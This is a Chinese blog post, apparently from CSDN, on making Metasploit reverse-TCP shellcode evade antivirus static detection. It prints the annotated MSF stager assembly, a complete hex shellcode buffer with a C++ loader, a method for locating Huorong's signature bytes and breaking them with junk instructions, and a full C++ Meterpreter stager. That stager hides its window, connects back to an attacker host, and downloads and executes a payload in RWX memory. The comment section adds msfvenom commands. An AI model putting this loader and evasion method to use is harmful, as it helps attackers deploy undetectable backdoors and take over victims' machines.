MSF实战免杀过静态:ShellCode加花指令

已于 2023-03-31 16:47:43 修改
阅读量1.1k 收藏 3
点赞数
分类专栏: 免杀实战 文章标签: c++ windows 系统安全 安全 网络安全
于 2023-03-30 21:13:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xf555er/article/details/129866852
版权

分析MSF的ShellCode

1.Hash寻找系统API函数

由于ShellCode是没有PE结构的,无法通过导入表来调用系统的API函数,因此,这部分是一个通用的API调用函数,它可以根据给定的哈希值查找并调用相应的API。在查找API时,它会遍历已加载模块的列表以及每个模块的导出地址表。这个函数在Shellcode中非常重要,因为它可以让我们不用硬编码API函数地址,而是动态地查找和调用它们。

;-----------------------------------------------------------------------------;
; 作者: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; 兼容性: NT4 及更新版本
; 架构: x86
; 大小: 140 字节
;-----------------------------------------------------------------------------;

[BITS 32]

; 输入: 要调用的API的哈希和所有参数必须被推送到栈上。
; 输出: API调用的返回值将在EAX寄存器中。
; 破坏: EAX, ECX和EDX (像正常的stdcall调用约定一样)
; 未破坏: 可以期望EBX、ESI、EDI、ESP和EBP保持不变。
; 注意: 该函数假定方向标志已经通过CLD指令清除。
; 注意: 该函数无法调用已转发的导出项。

api_call:
    pushad ; 保存所有寄存器给调用者,除了EAX和ECX。
    mov ebp, esp ; 创建新的堆栈帧
    xor edx, edx ; 将EDX清零
    mov edx, [fs:edx+0x30] ; 获取PEB的指针
    mov edx, [edx+0xc] ; 获取PEB->Ldr
    mov edx, [edx+0x14] ; 从内存中按顺序获取模块列表的第一个模块
next_mod: ;
    mov esi, [edx+0x28] ; 获取指向模块名称(Unicode字符串)的指针
    movzx ecx, word [edx+0x26] ; 将ECX设置为要检查的长度
    xor edi, edi ; 清除EDI,它将存储模块名称的哈希值
loop_modname: ;
    xor eax, eax ; 将EAX清零
    lodsb ; 读取名称的下一个字节
    cmp al, 'a' ; 一些版本的Windows使用小写模块名
    jl not_lowercase ;
	sub al, 0x20 ; 如果是,就将其归一化为大写字母
not_lowercase: ;
    ror edi, 0xd ; 将哈希值向右旋转
    add edi, eax ; 添加名称的下一个字节
    dec ecx
    jnz loop_modname ; 循环,直到读取了足够的字节
    ; 现在我们已经计算出了模块哈希
    push edx ; 为以后保存当前在模块列表中的位置
    push edi ; 为以后保存当前模块哈希
    ; 继续迭代导出地址表,
    mov edx, [edx+0x10] ; 获取此模块的基地址
    mov eax, [edx+0x3c] ; 获取PE头
    add eax, edx ; 添加模块的基地址
    mov eax, [eax+0x78] ; 获取导出表的RVA
    test eax, eax ; 测试是否没有导出地址表
    jz get_next_mod1 ; 如果没有EAT,则处理下一个模块
    add eax, edx ; 添加模块的基地址
    push eax ; 保存当前模块的EAT
    mov ecx, [eax+0x18] ; 获取函数名称的数量
    mov ebx, [eax+0x20] ; 获取函数名称的RVA
    add ebx, edx ; 添加模块的基地址
    ; 计算模块哈希 + 函数哈希
get_next_func: ;
    test ecx, ecx ; 由于下面的随机jmp产生的较大偏移量而更改自jcxz
    jz get_next_mod ; 当我们到达EAT的开始(我们向后搜索)时,处理下一个模块
    dec ecx ; 减少函数名称计数器
    mov esi, [ebx+ecx4] ; 获取下一个模块名称的RVA
    add esi, edx ; 添加模块的基地址
    xor edi, edi ; 清除EDI,它将存储函数名称的哈希值
    ; 并将其与我们要搜索的哈希值进行比较
    loop_funcname: ;
    xor eax, eax ; 将EAX清零
    lodsb ; 读取ASCII函数名称的下一个字节
    ror edi, 0xd ; 将哈希值向右旋转
    add edi, eax ; 添加名称的下一个字节
    cmp al, ah ; 将AL(名称的下一个字节)与AH(空值)进行比较
    jne loop_funcname ; 如果我们没有到达空终止符,就继续循环
    add edi, [ebp-8] ; 将当前模块哈希添加到函数哈希中
    cmp edi, [ebp+0x24] ; 将哈希与我们要搜索的哈希进行比较
    jnz get_next_func ; 如果我们没有找到它,就去计算下一个函数哈希
    ; 如果找到了,则修复堆栈,调用函数,然后返回值,否则计算下一个...
    pop eax ; 恢复当前模块的EAT
    mov ebx, [eax+0x24] ; 获取序数表的RVA
    add ebx, edx ; 添加模块的基地址
    mov cx, [ebx+2ecx] ; 获取所需函数的序数
    mov ebx, [eax+0x1c] ; 获取函数地址表的RVA
    add ebx, edx ; 添加模块的基地址
    mov eax, [ebx+4*ecx] ; 获取所需函数的RVA
    add eax, edx ; 将模块的基地址添加到获取函数的实际VA中
    ; 现在我们修复堆栈并调用所需的函数...
finish:
    mov [esp+0x24], eax ; 用即将进行的popad覆盖旧的EAX值
    pop ebx ; 清除当前模块哈    
    pop ebx ; 清除当前在模块列表中的位置
    popad ; 恢复调用者的所有寄存器,除了被破坏的EAX、ECX和EDX
    pop ecx ; 弹出调用者将要推送的原始返回地址
    pop edx ; 弹出调用者将要推送的哈希值
    push ecx ; 推回正确的返回值
    jmp eax ; 跳转到所需的函数
    ; 现在我们会自动返回到正确的调用者...

get_next_mod: ;
    pop eax ; 弹出当前(现在是上一个)模块的EAT
get_next_mod1: ;
    pop edi ; 弹出当前(现在是上一个)模块的哈希值
    pop edx ; 恢复我们在模块列表中的位置
    mov edx, [edx] ; 获取下一个模块
    jmp next_mod ; 处理此模块

2.建立反向TCP连接

这部分是一个创建反向TCP连接的Shellcode。首先,它加载ws2_32.dll库以使用网络功能,并调用WSAStartup函数初始化Winsock。接下来,它创建一个TCP套接字,并尝试连接到指定的IP地址和端口。如果连接失败,它会尝试重新连接,直到成功或达到最大重试次数。连接成功后,它将套接字存储在EDI寄存器中,以便在后续的Shellcode中使用

;-----------------------------------------------------------------------------;
; 作者: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; 兼容: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; 版本: 1.0 (2009年7月24日)
;-----------------------------------------------------------------------------;
[BITS 32]

; 输入: EBP必须是'api_call'的地址。
; 输出: EDI将是与服务器连接的套接字。
; 破坏: EAX、ESI、EDI、ESP也会被修改(-0x1A0)

reverse_tcp:
    push 0x00003233 ; 将'ws2_32'、0、0的字节推送到堆栈上。
    push 0x5F327377 ; ...
    push esp ; 将指向"ws2_32"字符串的指针推送到堆栈上。
    push 0x0726774C ; hash("kernel32.dll", "LoadLibraryA")
    call ebp ; LoadLibraryA("ws2_32")

    mov eax, 0x0190 ; EAX = sizeof( struct WSAData )
    sub esp, eax ; 为WSAData结构分配一些空间
    push esp ; 将一个指向此结构的指针推送到堆栈上
    push eax ; 将wVersionRequested参数推送到堆栈上
    push 0x006B8029 ; hash("ws2_32.dll", "WSAStartup")
    call ebp ; WSAStartup(0x0190, &WSAData);

    push eax ; 如果成功,eax将为零,为标志参数推送零。
    push eax ; 为保留参数推送空值
    push eax ; 我们不指定WSAPROTOCOL_INFO结构
    push eax ; 我们不指定协议
    inc eax ;
    push eax ; 推送SOCK_STREAM
    inc eax ;
    push eax ; 推送AF_INET
    push 0xE0DF0FEA ; hash("ws2_32.dll", "WSASocketA")
    call ebp ; WSASocketA(AF_INET, SOCK_STREAM, 0, 0, 0, 0);
    xchg edi, eax ; 保存套接字以备后用,不关心eax的值

set_address:
    push byte 0x05 ; 重试计数器
    push 0x0100007F ; 主机127.0.0.1
    push 0x5C110002 ; family为AF_INET,端口为4444
    mov esi, esp ; 保存sockaddr结构的指针

try_connect:
    push byte 16 ; sockaddr结构的长度
    push esi ; sockaddr结构的指针
    push edi ; 套接字
    push 0x6174A599 ; hash("ws2_32.dll", "connect")
    call ebp ; connect(s, &sockaddr, 16);

    test eax,eax ; 非零表示失败
	jz short connected

handle_failure:
    dec dword [esi+8]
    jnz; 短跳转到try_connect标签处继续尝试连接

failure:
    push 0x56A2B5F0 ; 硬编码为exitprocess以控制大小
    call ebp

connected:

3.接收并执行命令

这部分主要用于接收和执行来自反向TCP连接的第二阶段Payload。首先,它调用recv函数接收第二阶段Payload的长度。然后,它使用VirtualAlloc函数分配一个具有执行权限的内存缓冲区,用于存储接收到的第二阶段Payload。接下来,它通过recv函数将Payload接收到分配的缓冲区。最后,它跳转到缓冲区的地址,执行接收到的第二阶段Payload

;-----------------------------------------------------------------------------;
; 作者:Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; 兼容性:Windows 7,2008,Vista,2003,XP,2000,NT4
; 版本:1.0(2009年7月24日)
;-----------------------------------------------------------------------------;
[BITS 32]

; 兼容性:block_bind_tcp,block_reverse_tcp,block_reverse_ipv6_tcp

; 输入:EBP必须是'api_call'的地址。EDI必须是套接字。ESI是堆栈上的指针。
; 输出:无。
; 修改:EAX,EBX,ESI,(ESP也将被修改)

recv:
    ; 接收第二阶段的大小...
    push byte 0 ; 标志
    push byte 4 ; 长度 = sizeof( DWORD );
    push esi ; 在堆栈上的4字节缓冲区来保存第二阶段的长度
    push edi ; 已保存的套接字
    push 0x5FC8D902 ; hash( "ws2_32.dll", "recv" )
    call ebp ; recv( s, &dwLength, 4, 0 );
    ; 为第二阶段分配一个RWX缓冲区
    mov esi, [esi] ; 解引用指向第二阶段长度的指针
    push byte 0x40 ; PAGE_EXECUTE_READWRITE
    push 0x1000 ; MEM_COMMIT
    push esi ; 推入新接收到的第二阶段长度。
    push byte 0 ; NULL,因为我们不在意分配的位置。
    push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" )
    call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
    ; 接收并执行第二阶段...
    xchg ebx, eax ; ebx = 新内存地址,用于存放新的第二阶段代码
    push ebx ; 推入新第二阶段的地址,以便我们可以跳转到其中
read_more: ;
    push byte 0 ; 标志
    push esi ; 长度
    push ebx ; 当前指向我们的第二阶段RWX缓冲区的地址
    push edi ; 已保存的套接字
    push 0x5FC8D902 ; hash( "ws2_32.dll", "recv" )
    call ebp ; recv( s, buffer, length, 0 );
    add ebx, eax ; buffer += bytes_received
    sub esi, eax ; length -= bytes_received, 将设置标志
    jnz read_more ; 如果还有要读取的内容,则继续
    ret ; 跳转到第二阶段代码中执行

总结

第一部分(api_call)是一个通用API调用函数,用于动态查找和调用API。第二部分(reverse_tcp)创建一个反向TCP连接,将本地机器连接到攻击者的监听器。第三部分(recv)负责接收并执行第二阶段Payload。这三部分共同实现了一段完整的Shellcode,用于反向连接攻击者机器并执行远程指令


免杀实战

1.修改API函数的Hash值

在MSF ShellCode的第一段汇编指令中,有一个ror指令,其后接一个立即数,这个立即数十分重要。可以发现,在上述汇编指令中每一个api函数的hash值都是固定的,这种情况就很容易被杀毒通过排查特征码查杀掉,但是可以通过修改ror指令后面的立即数来改变api函数的hash值

image-20230324230523563


可使用apihashreplace.py脚本对MSF生成的二进制Shellcode文件进行修改ror指令后的立即数值,使用方法如下, 32位系统下的ShellCode就输入32,同理64位则输入64

python3 apihashreplace.py 32 1.bin

image-20230330154253955


修改完后会在当前目录生成0x?.bin,如下图所示

image-20230324231204919


2.将ShellCode写入Cpp

使用winhex或者editor工具复制bin文件的十六进制内容至C++项目中, 如下代码所示,随后生成可执行文件

pragma comment(linker, "/section:.data,RWE")//对于内存的保护属性 可读可写可执行

//从Bin文件复制过来的ShellCode
unsigned char buf[] =
"\xFC\xE8\x8F\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B"
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0"
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x07\x01\xC7\x49\x75\xEF\x52"
"\x8B\x52\x10\x57\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4C"
"\x01\xD0\x8B\x48\x18\x8B\x58\x20\x01\xD3\x50\x85\xC9\x74\x3C\x49"
"\x8B\x34\x8B\x31\xFF\x01\xD6\x31\xC0\xC1\xCF\x07\xAC\x01\xC7\x38"
"\xE0\x75\xF4\x03\x7D\xF8\x3B\x7D\x24\x75\xE0\x58\x8B\x58\x24\x01"
"\xD3\x66\x8B\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89"
"\x44\x24\x24\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12"
"\xE9\x80\xFF\xFF\xFF\x5D\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F"
"\x54\x68\xd2\x53\x6e\xfc\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29"
"\xc4\x54\x50\x68\x9c\x13\x41\xc4\xff\xd5\x6a\x0a\x68\xc0\xa8\x2f"
"\x9b\x68\x02\x00\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"
"\x68\x2c\x9b\xfc\xa4\xff\xd5\x97\x6a\x10\x56\x57\x68\xb6\x59\xc0"
"\x0e\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67\x00\x00"
"\x00\x6a\x00\x6a\x04\x56\x57\x68\xe8\xd9\xce\x36\xff\xd5\x83\xf8"
"\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68"
"\x9c\xed\x92\x66\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\xe8\xd9"
"\xce\x36\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68\x00\x40\x00\x00\x6a"
"\x00\x50\x68\x3e\xba\x17\xa3\xff\xd5\x57\x68\xe6\xfc\xe1\xe2\xff"
"\xd5\x5e\x5e\xff\x0c\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff"
"\xff\x01\xc3\x29\xc6\x75\xc1\xc3\xbb\xfc\xd3\xf4\x5e\x6a\x00\x53"
"\xff\xd5";

void main() {
	__asm {
		lea eax,buf
		call eax
	}
}

3.定位报毒特征码

生成的可执行文件很快就被火绒干掉了,使用工具Virtest5.0来查看哪处的特征码被查杀掉了, 此处我就不演示此款工具的使用方法了,在1ceb偏移处有4个字节被查杀了,分别是FC A4 FF D5

1


将可执行文件放入OD调试, 通过偏移量或者特征码跳转至FC A4 FF D5所在位置, FF D5 表示的汇编指令是call ebp, FC A4属于立即数0XA4FC982C的一部分

1


4.修改报毒特征码

首先判断火绒查杀的是否是立即数的内容, 在ShellCode修改立即数的报毒部分, 此处我将\xa4的值修改成了\xa1, 修改完后火绒没有报毒

1


但是通过上述MSF的Shellcode组成部分可以得知, 这个立即数表示WSASocketA函数的地址hash值, 也就是说这段内容修改了后ShellCode就会失效

image-20230326115201418

于是采用第二个方法:加花指令。这里我用点简单花指令push eaxpop eax, 其对应的硬编码分别是\x50\x58, 将花指令添加到立即数得后面, 即报毒特征码FC A4 FF D5的中间

1


再次生成可执行文件后火绒不会查杀了, 而且msf也能正常上线

1


Meterpreter的C++版本

项目代码

include <WinSock2.h>
include <stdio.h>
pragma warning (disable: 4996)
pragma comment(lib,"WS2_32.lib")
include<windows.h>

int main(int argc, char** argv)
{
	// 隐藏当前窗口
	ShowWindow(GetForegroundWindow(), 0);

	// 初始化 WinSock 并分配资源
	WSADATA wsData;
	if (WSAStartup(MAKEWORD(2, 2), &wsData))
	{
		printf("WSAStartup failed.\n");
		return 0;
	}
	
	// 创建 socket 并连接到服务器
	SOCKET sock = WSASocket(AF_INET, SOCK_STREAM, 0, 0, 0, 0);
	SOCKADDR_IN server;
	ZeroMemory(&server, sizeof(SOCKADDR_IN));
	server.sin_family = AF_INET;
	server.sin_addr.s_addr = inet_addr("192.168.47.155"); // 服务器 IP
	server.sin_port = htons(4444); // 服务器端口
	if (SOCKET_ERROR == connect(sock, (SOCKADDR*)&server, sizeof(server)))
	{
		printf("connect to server failed.\n");
		goto Fail;
	}

	// 接收载荷长度
	u_int payloadLen;
	if (recv(sock, (char*)&payloadLen, sizeof(payloadLen), 0) != sizeof(payloadLen))
	{
		printf("recv error\n");
		goto Fail;
	}

	// 分配内存空间以接收实际载荷
	char* orig_buffer;
	orig_buffer = (char*)VirtualAlloc(NULL, payloadLen, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	char* buffer;
	buffer = orig_buffer;
	int ret;
	ret = 0;
	do
	{
		ret = recv(sock, buffer, payloadLen, 0);
		buffer += ret;
		payloadLen -= ret;
	} while (ret > 0 && payloadLen > 0);

	// 将参数传入并执行载荷
	__asm
	{
		mov edi, sock;   // 将 sock 存储在 edi 寄存器中
		jmp orig_buffer; // 转移执行权至载荷,不要指望它返回。如果想要它返回,修改量比较大,不如把这个地方做成个线程,监听端设置退出时ExitThread更方便
	}

	// 释放内存空间
	VirtualFree(orig_buffer, 0, MEM_RELEASE);

Fail:
	// 关闭 socket 并清理 WinSock 资源
	closesocket(sock);
	WSACleanup();
	return 0;
}

项目代码分析

1.主函数定义实现隐藏窗口

这里定义了主函数 main,并使用 ShowWindow 函数隐藏当前窗口

int main(int argc, char** argv)
{
    ShowWindow(GetForegroundWindow(), 0);
}

2.初始化WinSock

WSADATA wsData;
if (WSAStartup(MAKEWORD(2, 2), &wsData))
{
    printf("WSAStartup failed.\n");
    return 0;
}

这段代码初始化 WinSock 库并检查是否成功。如果失败,程序将输出错误信息并退出。

3.创建socket并连接服务器

SOCKET sock = WSASocket(AF_INET, SOCK_STREAM, 0, 0, 0, 0);  //这行代码使用 WSASocket 函数创建了一个新的 socket。参数 AF_INET 表示使用 IPv4 地址族,SOCK_STREAM 表示使用可靠的字节流套接字(TCP)。其他参数为0,表示使用默认的协议和选项

SOCKADDR_IN server;  //定义服务器地址结构体

ZeroMemory(&server, sizeof(SOCKADDR_IN));  //清零服务器地址结构体

server.sin_family = AF_INET;  //将服务器地址结构体的地址族设置为 AF_INET,表示使用 IPv4

server.sin_addr.s_addr = inet_addr("192.168.47.155");  //将服务器 IP 地址设置为 "192.168.47.155"。inet_addr 函数将点分十进制表示的 IP 地址转换为网络字节序的 32 位整数

server.sin_port = htons(4444);  //将服务器的端口设置为4444,htons函数将主机字节序的整数(本例中为4444)转换为网络字节序的整数

//使用 connect 函数尝试连接到服务器。connect 函数接受三个参数:已创建的 socket,一个指向服务器地址结构体的指针(需要将其转换为 SOCKADDR* 类型),以及服务器地址结构体的大小。如果连接失败,connect 函数将返回 SOCKET_ERROR,然后输出错误信息并跳转到 Fail 标签进行资源清理
if (SOCKET_ERROR == connect(sock, (SOCKADDR*)&server, sizeof(server)))  //
{
    printf("connect to server failed.\n");
    goto Fail;
}

这部分代码创建了一个新的 socket,并设置服务器的 IP 地址和端口。然后尝试连接到服务器。如果连接失败,程序将输出错误信息并跳转到 Fail 标签


4.从服务器接收载荷(payload)长度

u_int payloadLen;
if (recv(sock, (char*)&payloadLen, sizeof(payloadLen), 0) != sizeof(payloadLen))
{
    printf("recv error\n");
    goto Fail;
}

这段代码接收服务器发送的载荷长度。如果接收失败,程序将输出错误信息并跳转到 Fail 标签


5.分配内存空间以接收实际载荷,并从服务器接收载荷

char* orig_buffer;
orig_buffer = (char*)VirtualAlloc(NULL, payloadLen, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
char* buffer;
buffer = orig_buffer;
int ret;
ret = 0;
do
{
ret = recv(sock, buffer, payloadLen, 0);
buffer += ret;
payloadLen -= ret;
} while (ret > 0 && payloadLen > 0);

这部分代码首先分配足够的内存空间以接收实际载荷。然后,使用循环从服务器接收载荷,直到接收完毕


6.执行载荷

__asm
{
    mov edi, sock;
    jmp orig_buffer;
}

这段代码是用内嵌汇编编写的。它将 sock 的值移动到 edi 寄存器中,然后将执行权跳转到 orig_buffer 指向的内存地址。这意味着程序将开始执行接收到的载荷


7.释放内存空间以及处理失败的情况

VirtualFree(orig_buffer, 0, MEM_RELEASE);

Fail:
    closesocket(sock);
    WSACleanup();
    return 0;

释放了之前分配的 orig_buffer 内存空间,若在前面的代码发生了错误,程序将跳转至这里,随后关闭socket和清理WinSock使用的资源


项目测试

在虚拟机运行的时候把Windows Defener关掉了,因为过不了动态查杀,但是静态还是能过的

1

工具获取

本篇文章所用到的脚本工具我都放在群上了, 欢迎各位大佬进群学习交流: 755412787

Henry404s
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
使用MSF生成shellcode
weixin_34092455的博客
04-02 1018
使用MSF生成shellcode payload和shellcode的区别 Payload是是包含在你用于一次漏洞利用(exploit)中的ShellCode中的主要功能代码。因为Payload是包含在ShellCode中的,ShellCode是真正的被输入到存在漏洞的程序中的,并且ShellCode负责把程序的流程最终转移到你的Payload代码中。所以对于一个漏洞来说,ShellCode就...
msf shellcode分离免杀技术
yy
05-27 1874
一般的shellcode是直接放在程序里面执行,分离免杀是将恶意代码放置在程序本身之外的一种加载方式。本实验轻松绕过最新版火绒和360 msf免杀 shellcode分离免杀
msf编码免杀
m0_61506558的博客
09-03 2363
自编码处理自捆绑+编码多重编码接口下载式签名伪装式
ShellCodeLoader:用于MSF和钴击的ShellCode Loader
05-24
ShellCode加载器 用于MSF和钴击的ShellCode Loader msfvenom -p windows/exec CMD=calc.exe -fc 的shellcode:bf6e4a2508d9ebd97424f45d33c9b131317d13037d1383c56aa8d0f49aae1b055acf92e06bcfc161dbff8224d774c6dc6cf8cfd3c5b729ddd6e40a7c54f75e5e6538939fa2255ecd7b21cde2087fce894291566d1290772029cb57c2fe67dedce342a857d7392bbe26c180ff8730d8382fabaf304c56a8862f8c3d1d9747e5f9268b70892460f6d52877db6d54fcdaa1dd46f965861d603f62
msf 生成 shellcode 利用 python 加载 免杀
YingZi's Blog
08-04 1734
msf 生成 shellcode 利用 python 加载 免杀 前言 网上有很多教程,但是可能教程中的payload 放到本地就是没有办法跑起来 例如这种报错就是shellcodeloader的问题 # 商业转载请联系作者获得授权,非商业转载请注明出处。 # For commercial use, please contact the author for authorization. For non-commercial use, please indicate the source. # 协议(L
msf免杀木马生成
qq_66985187的博客
07-04 2180
等黑客技术,所以难度很高,一般人不会或没能力接触这技术的深层内容。其内容基本上都是修改病毒、木马的内容改变特征码,从而躲避了杀毒软件的查杀。set payload windows/meterpreter/reverse_tcp#设置攻击位。本章是通过msfmsfvenom)命令实现免杀的操作。由于免杀技术的涉猎面非常广,其中包含反。简称"免杀",它指的是一种能使病毒木马免于被。补充:常见的后门生成方式!在kali中生成常见的木马命令。
初学MSF之渗透、提权、免杀(上)
qq_53058639的博客
08-01 1237
Metasploit是一个免费的、可下载的渗透测试框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞攻击工具,并且MSF团队始终在更新MSF的漏洞库,这使得MSF始终充满生机。通俗的讲,MSF就是一个集成了渗透测试全流程的渗透工具,理论上讲,我们可以只依靠MSF完成从信息收集到最终的制作后门并清理入侵痕迹的渗透测试全过程。
4.1 MSF 制作shellcode,且运行
qq_55202378的博客
08-25 2954
msf shellcode
msf生成免杀木马
qq_56426046的博客
09-08 5222
1.修改特征码免杀的最基本思想就是破坏特征,这个特征有可能是特征码,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。(特征码:能识别一个程序是病毒的一段不大于64字节的特征串)就目前的反病毒技术来讲,更改特征码从而达到免杀的效果事实上包含着两种方式。一种是改特征码,这也是免杀的最初方法。例如一个文件在某一个地址内有“灰鸽子上线成功!”这么一句话,表明它就是木马,只要将相应地址内的那句话改成别的就可以了,如果是无关痛痒的,直接将其删掉也未尝不可。
免杀方法(三)msf加载器免杀
qq_56426046的博客
10-03 1008
编辑i686-w64-mingw32-gcc main.c -o mm.exe-lws2_32。Metasploit还有编码器模块(Encoders),生成后门前,对其进行编码转换,可以混。metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具,Framework(MSF)在2003年以开放源码方式发布,是可以自由获取的开发框架。它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试。在红队中是个香饽饽,使用这个模块生成的后门,不仅支持多种平台,而且。
gld:进入Shellcode LoaDer
05-24
我编写了一个包含更多规避技术的私有框架,将来可能会公开用法首先通过CS / MSF生成shellcode,然后使用gld编译包装的二进制文件: ./gld shellcode.bin [x64/x86]科技类装载机Shellcode通过AES-GCM加密,它将被...
通过Python实现Payload分离免杀过程详解
01-19
msf生成shellcode代码: 将payload给copy下来,去除引号。 \x2f\x4f\x69\x43\x41\x41\x41\x41\x59\x49\x6e\x6c\x4d\x63\x42 \x6b\x69\x31\x41\x77\x69\x31\x49\x4d\x69\x31\x49\x55\x69\x33 \x49\x6f\x44\x37\x64\...
无人驾驶算法学习:多传感器融合MSF算法
02-24
但还有另外一个开源的程序,ETH的MSF,可以比较方便地用在自己的工程里面,并且它的理论与误差状态四元数很接近,稍微有点不同,所以MSF开源程序就成了一个不错的选择。所以本人研究了ETH的两篇文章:...
C 练习实例36 - 求100之内的素数
最新发布
2401_82561004的博客
04-27 972
质数(prime number)又称素数,有无限个。一个大于1的自然数,除了1和它本身外,不能被其他自然数整除。// Copyright © 2013年 编程字典. All rights reserved.求100之内的素数。
C++ Primer (第五版)第八章习题部分答案
weixin_48467622的博客
04-27 1001
C++ Primer (第五版)第八章习题部分答案
手搓顺序表(C语言)
m0_62646213的博客
04-23 695
顺序表头插头删,尾插尾删,任意位置插入删除的实现和优劣分析
c入门基础题(3)
梦昼初
04-26 893
1、找出数组中最大元素的位置(下标值) 输入 多组测试,每组先输入一个不大于10的整数n 然后是n个整数 输出 输出这n个整数中最大的元素及下标值 样例输入 4 1 4 5 6 样例输出 6 3 #include<stdio.h> int main(){ int a[20]; int n,x=0,y,z,s,m,f; int i,j; while(scanf("%d",&n)!=EOF){ for(i=1;i<=n;i++){ scanf("%d",&y)
(C++) this_thread 函数介绍
cuber-lotus的博客
04-24 1528
C++11起,标准规定了标注的并发库。头文件为并发支持库 (C++11 起) - cppreference.com其包含线程、原子操作、互斥、条件变量和 future 的内建支持。而其中有一个namespace为,里面有四个重要的全局函数,其实现都与当前系统环境和编译器强绑定。std::this_thread 符号索引 - cppreference.comget_id()yield()返回当前线程的id。这个id是一个的内部类型。其实现依附于所在平台。
从C语言到C++过渡篇(快速入门C++
2302_80023639的博客
04-27 701
C语言->C++的过渡(快速入门C++) 命名空间、C++输入与输出(cout && cin)、缺省参数、函数重载 引用、内联函数、auto 关键字、区别于C语言的空指针(nullptr)
msf生成shellcode
06-28
### 回答1: MSF生成shellcode是一种常见的渗透测试技术,可以用于获取目标系统的控制权。使用MSF生成shellcode需要掌握一定的技术知识和经验,包括了解目标系统的漏洞、了解不同类型的shellcode以及使用MSF生成工具等。通过合理使用MSF生成shellcode,可以有效提高渗透测试的效率和成功率。 ### 回答2: MSF(Metasploit Framework)是一个广泛使用的渗透测试工具,常用于开发和测试网络安全漏洞。它的一个特色是可以自动生成各种Payload,包括各种平台的ShellcodeShellcode是一种十六进制编码的机器语言代码,它通常被黑客和渗透测试人员用于攻击目标计算机系统。通过使用MSF Framework,我们可以生成各种类型的Shellcode,这些Shellcode可以按照我们自己的需要进行定制。 在MSF Framework中,我们可以使用msfvenom工具生成Shellcode,该工具是一个十分强大的Payload 生成器,使用起来非常简单。首先,我们要指定Payload的类型,比如说是Windows还是Linux,以及处理器架构和操作系统版本。 生成Windows平台的Shellcode,我们可以使用下面这条命令: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f hex -o shellcode.txt 其中,“-p”指定Payload,这里我们使用的是windows/meterpreter/reverse_tcp,它可以反向连接我们指定的IP地址和端口。LHOST是我们的IP地址,LPORT是监听的端口。然后我们指定输出格式是hex,将其输出到shellcode.txt文件中。 生成Linux平台的Shellcode也很简单,我们可以使用下面这条命令: msfvenom -p linux/x86/shell/reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f hex -o shellcode.txt 这里我们使用的是linux/x86/shell/reverse_tcp Payload,它也可以反向连接指定的IP地址和端口。 总的来说,生成Shellcode是非常重要的黑客工作,使用MSF Framework的msfvenom工具可以帮我们快速生成各种类型的Shellcode,而且十分方便实用。但是需要注意的是,使用Shellcode进行攻击可能会违法,所以使用前要自觉遵守相关法律规定。 ### 回答3: MSF是Metasploit框架的简称,它是一种广泛使用的网络攻击工具。MSF有许多功能,其中一个基本功能就是生成shellcodeShellcode是位于程序中的二进制代码,其目的是执行特定的操作,比如弹出一个命令行窗口来执行攻击者命令等等。在网络攻击中,shellcode往往是黑客的“最后一击”,用来穿过目标系统的防御措施,从而实现控制盗窃信息或实施其他恶意行为。 MSF生成shellcode的步骤如下: 1. 打开MSF控制台,使用"msfvenom"命令来生成shellcode。我们可以使用如下命令来进行生成: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker IP address> LPORT=<attacker port number> -f <output file format> -o <output file location> 其中,“-p"参数代表payload(负载,即要注入目标系统的代码),windows/meterpreter/reverse_tcp是要注入的代码类型;"LHOST"参数代表攻击者的IP地址,"LPORT"参数代表攻击者的端口号;"-f"参数代表输出文件的格式;"-o"参数代表输出文件的位置。 2. 运行该命令后,MSF会生成自定义的shellcode,其格式为二进制代码。我们可以将其保存在本地,以备后续使用。 3. 将shellcode注入到目标系统中。可以使用一些漏洞利用工具,如MSF框架,或在攻击者手动操作目标系统时,利用目标服务器上已知漏洞的服务向该服务器注入shellcode。一旦该shellcode开始运行,攻击者就可以进入目标服务器并获取所需的信息。 需要注意的是,生成shellcode需要有一定的网络安全知识以及操作系统相关知识。同时,使用MSF框架及其相关工具进行攻击是非法行为,一定要遵守法律规定。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
